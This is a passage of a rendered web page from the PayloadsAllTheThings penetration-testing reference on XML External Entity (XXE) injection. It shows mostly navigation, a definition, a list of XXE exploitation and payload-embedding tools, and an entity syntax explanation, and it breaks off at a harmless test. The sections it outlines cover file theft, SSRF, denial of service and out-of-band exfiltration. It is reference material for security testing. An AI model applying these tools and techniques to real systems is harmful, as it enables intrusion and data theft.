Server Side Template Injection - JavaScript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/PHP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - PHP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Python/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Ruby
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52_2" >
<label class="md-nav__link" for="__nav_52_2" id="__nav_52_2_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_52_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52_2">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" checked>
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
XML External Entity
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#detect-the-vulnerability" class="md-nav__link">
<span class="md-ellipsis">
Detect The Vulnerability
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-retrieve-files" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Retrieve Files
</span>
</a>
<nav class="md-nav" aria-label="Exploiting XXE to Retrieve Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#classic-xxe" class="md-nav__link">
<span class="md-ellipsis">
Classic XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#classic-xxe-base64-encoded" class="md-nav__link">
<span class="md-ellipsis">
Classic XXE Base64 Encoded
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#php-wrapper-inside-xxe" class="md-nav__link">
<span class="md-ellipsis">
PHP Wrapper Inside XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xinclude-attacks" class="md-nav__link">
<span class="md-ellipsis">
XInclude Attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-perform-ssrf-attacks" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Perform SSRF Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-perform-a-denial-of-service" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Perform a Denial of Service
</span>
</a>
<nav class="md-nav" aria-label="Exploiting XXE to Perform a Denial of Service">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#billion-laugh-attack" class="md-nav__link">
<span class="md-ellipsis">
Billion Laugh Attack
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#yaml-attack" class="md-nav__link">
<span class="md-ellipsis">
YAML Attack
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#parameters-laugh-attack" class="md-nav__link">
<span class="md-ellipsis">
Parameters Laugh Attack
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-error-based-xxe" class="md-nav__link">
<span class="md-ellipsis">
Exploiting Error Based XXE
</span>
</a>
<nav class="md-nav" aria-label="Exploiting Error Based XXE">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#error-based-using-local-dtd-file" class="md-nav__link">
<span class="md-ellipsis">
Error Based - Using Local DTD File
</span>
</a>
<nav class="md-nav" aria-label="Error Based - Using Local DTD File">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#linux-local-dtd" class="md-nav__link">
<span class="md-ellipsis">
Linux Local DTD
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-local-dtd" class="md-nav__link">
<span class="md-ellipsis">
Windows Local DTD
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#error-based-using-remote-dtd" class="md-nav__link">
<span class="md-ellipsis">
Error Based - Using Remote DTD
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-blind-xxe-to-exfiltrate-data-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
Exploiting Blind XXE to Exfiltrate Data Out of Band
</span>
</a>
<nav class="md-nav" aria-label="Exploiting Blind XXE to Exfiltrate Data Out of Band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#basic-blind-xxe" class="md-nav__link">
<span class="md-ellipsis">
Basic Blind XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-attack-yunusov-2013" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB Attack (Yunusov, 2013)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-with-dtd-and-php-filter" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB with DTD and PHP Filter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-with-apache-karaf" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB with Apache Karaf
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#waf-bypasses" class="md-nav__link">
<span class="md-ellipsis">
WAF Bypasses
</span>
</a>
<nav class="md-nav" aria-label="WAF Bypasses">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#bypass-via-character-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass via Character Encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-on-json-endpoints" class="md-nav__link">
<span class="md-ellipsis">
XXE on JSON Endpoints
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xxe-in-exotic-files" class="md-nav__link">
<span class="md-ellipsis">
XXE in Exotic Files
</span>
</a>
<nav class="md-nav" aria-label="XXE in Exotic Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xxe-inside-svg" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside SVG
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-soap" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside SOAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-docx-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside DOCX file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-xlsx-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside XLSX file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-dtd-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside DTD file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#detect-the-vulnerability" class="md-nav__link">
<span class="md-ellipsis">
Detect The Vulnerability
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-retrieve-files" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Retrieve Files
</span>
</a>
<nav class="md-nav" aria-label="Exploiting XXE to Retrieve Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#classic-xxe" class="md-nav__link">
<span class="md-ellipsis">
Classic XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#classic-xxe-base64-encoded" class="md-nav__link">
<span class="md-ellipsis">
Classic XXE Base64 Encoded
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#php-wrapper-inside-xxe" class="md-nav__link">
<span class="md-ellipsis">
PHP Wrapper Inside XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xinclude-attacks" class="md-nav__link">
<span class="md-ellipsis">
XInclude Attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-perform-ssrf-attacks" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Perform SSRF Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#exploiting-xxe-to-perform-a-denial-of-service" class="md-nav__link">
<span class="md-ellipsis">
Exploiting XXE to Perform a Denial of Service
</span>
</a>
<nav class="md-nav" aria-label="Exploiting XXE to Perform a Denial of Service">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#billion-laugh-attack" class="md-nav__link">
<span class="md-ellipsis">
Billion Laugh Attack
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#yaml-attack" class="md-nav__link">
<span class="md-ellipsis">
YAML Attack
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#parameters-laugh-attack" class="md-nav__link">
<span class="md-ellipsis">
Parameters Laugh Attack
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-error-based-xxe" class="md-nav__link">
<span class="md-ellipsis">
Exploiting Error Based XXE
</span>
</a>
<nav class="md-nav" aria-label="Exploiting Error Based XXE">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#error-based-using-local-dtd-file" class="md-nav__link">
<span class="md-ellipsis">
Error Based - Using Local DTD File
</span>
</a>
<nav class="md-nav" aria-label="Error Based - Using Local DTD File">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#linux-local-dtd" class="md-nav__link">
<span class="md-ellipsis">
Linux Local DTD
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-local-dtd" class="md-nav__link">
<span class="md-ellipsis">
Windows Local DTD
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#error-based-using-remote-dtd" class="md-nav__link">
<span class="md-ellipsis">
Error Based - Using Remote DTD
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploiting-blind-xxe-to-exfiltrate-data-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
Exploiting Blind XXE to Exfiltrate Data Out of Band
</span>
</a>
<nav class="md-nav" aria-label="Exploiting Blind XXE to Exfiltrate Data Out of Band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#basic-blind-xxe" class="md-nav__link">
<span class="md-ellipsis">
Basic Blind XXE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-attack-yunusov-2013" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB Attack (Yunusov, 2013)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-with-dtd-and-php-filter" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB with DTD and PHP Filter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-oob-with-apache-karaf" class="md-nav__link">
<span class="md-ellipsis">
XXE OOB with Apache Karaf
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#waf-bypasses" class="md-nav__link">
<span class="md-ellipsis">
WAF Bypasses
</span>
</a>
<nav class="md-nav" aria-label="WAF Bypasses">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#bypass-via-character-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass via Character Encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-on-json-endpoints" class="md-nav__link">
<span class="md-ellipsis">
XXE on JSON Endpoints
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xxe-in-exotic-files" class="md-nav__link">
<span class="md-ellipsis">
XXE in Exotic Files
</span>
</a>
<nav class="md-nav" aria-label="XXE in Exotic Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xxe-inside-svg" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside SVG
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-soap" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside SOAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-docx-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside DOCX file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-xlsx-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside XLSX file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xxe-inside-dtd-file" class="md-nav__link">
<span class="md-ellipsis">
XXE Inside DTD file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE Injection/README.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/XXE Injection/README.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="xml-external-entity">XML External Entity</h1>
<blockquote>
<p>An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#detect-the-vulnerability">Detect The Vulnerability</a></li>
<li><a href="#exploiting-xxe-to-retrieve-files">Exploiting XXE to Retrieve Files</a><ul>
<li><a href="#classic-xxe">Classic XXE</a></li>
<li><a href="#classic-xxe-base64-encoded">Classic XXE Base64 Encoded</a></li>
<li><a href="#php-wrapper-inside-xxe">PHP Wrapper Inside XXE</a></li>
<li><a href="#xinclude-attacks">XInclude Attacks</a></li>
</ul>
</li>
<li><a href="#exploiting-xxe-to-perform-SSRF-attacks">Exploiting XXE to Perform SSRF Attacks</a></li>
<li><a href="#exploiting-xxe-to-perform-a-denial-of-service">Exploiting XXE to Perform a Denial of Service</a><ul>
<li><a href="#billion-laugh-attack">Billion Laugh Attack</a></li>
<li><a href="#yaml-attack">YAML Attack</a></li>
<li><a href="#parameters-laugh-attack">Parameters Laugh Attack</a></li>
</ul>
</li>
<li><a href="#exploiting-error-based-xxe">Exploiting Error Based XXE</a><ul>
<li><a href="#error-based---using-local-dtd-file">Error Based - Using Local DTD File</a><ul>
<li><a href="#linux-local-dtd">Linux Local DTD</a></li>
<li><a href="#windows-local-dtd">Windows Local DTD</a></li>
</ul>
</li>
<li><a href="#error-based---using-remote-dtd">Error Based - Using Remote DTD</a></li>
</ul>
</li>
<li><a href="#exploiting-blind-xxe-to-exfiltrate-data-out-of-band">Exploiting Blind XXE to Exfiltrate Data Out Of Band</a><ul>
<li><a href="#blind-xxe">Blind XXE</a></li>
<li><a href="#xxe-oob-attack-yusonov---2013">XXE OOB Attack (Yunusov, 2013)</a></li>
<li><a href="#xxe-oob-with-dtd-and-php-filter">XXE OOB with DTD and PHP Filter</a></li>
<li><a href="#xxe-oob-with-apache-karaf">XXE OOB with Apache Karaf</a></li>
</ul>
</li>
<li><a href="#waf-bypasses">WAF Bypasses</a></li>
<li><a href="#bypass-via-character-encoding">Bypass via Character Encoding</a></li>
<li><a href="#xxe-on-json-endpoints">XXE on JSON Endpoints</a></li>
<li><a href="#xxe-in-exotic-files">XXE in Exotic Files</a><ul>
<li><a href="#xxe-inside-svg">XXE Inside SVG</a></li>
<li><a href="#xxe-inside-soap">XXE Inside SOAP</a></li>
<li><a href="#xxe-inside-docx-file">XXE Inside DOCX file</a></li>
<li><a href="#xxe-inside-xlsx-file">XXE Inside XLSX file</a></li>
<li><a href="#xxe-inside-dtd-file">XXE Inside DTD file</a></li>
</ul>
</li>
<li><a href="#labs">Labs</a></li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/staaldraad/xxeserv">staaldraad/xxeftp</a> - A mini webserver with FTP support for XXE payloads</li>
<li><a href="https://github.com/lc/230-OOB">lc/230-OOB</a> - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via <a href="http://xxe.sh/">http://xxe.sh/</a></li>
<li><a href="https://github.com/enjoiz/XXEinjector">enjoiz/XXEinjector</a> - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods</li>
<li><a href="https://github.com/BuffaloWill/oxml_xxe">BuffaloWill/oxml_xxe</a> - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)</li>
<li><a href="https://github.com/whitel1st/docem">whitel1st/docem</a> - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc</li>
</ul>
<h2 id="detect-the-vulnerability">Detect The Vulnerability</h2>
<p><strong>Internal Entity</strong>: If an entity is declared within a DTD it is called an internal entity.
Syntax: <code>&lt;!ENTITY entity_name "entity_value"&gt;</code></p>
<p><strong>External Entity</strong>: If an entity is declared outside a DTD it is called an external entity. Identified by <code>SYSTEM</code>.
Syntax: <code>&lt;!ENTITY entity_name SYSTEM "entity_value"&gt;</code></p>
<p>Basic entity test, when the XML parser parses the external entities the result should contain "John" in <code>firstName</code> and "Doe" in <code>lastName</code>. Entities are defined inside the <code>DOCTYPE</code> element.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="cm">&lt;!--?xml version=&quot;1.0&quot; ?--&gt;</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="cp">&lt;!DOCTYPE replace [&lt;!ENTITY example &quot;Doe&quot;&gt;</span><span class="w"> </span>]&gt;
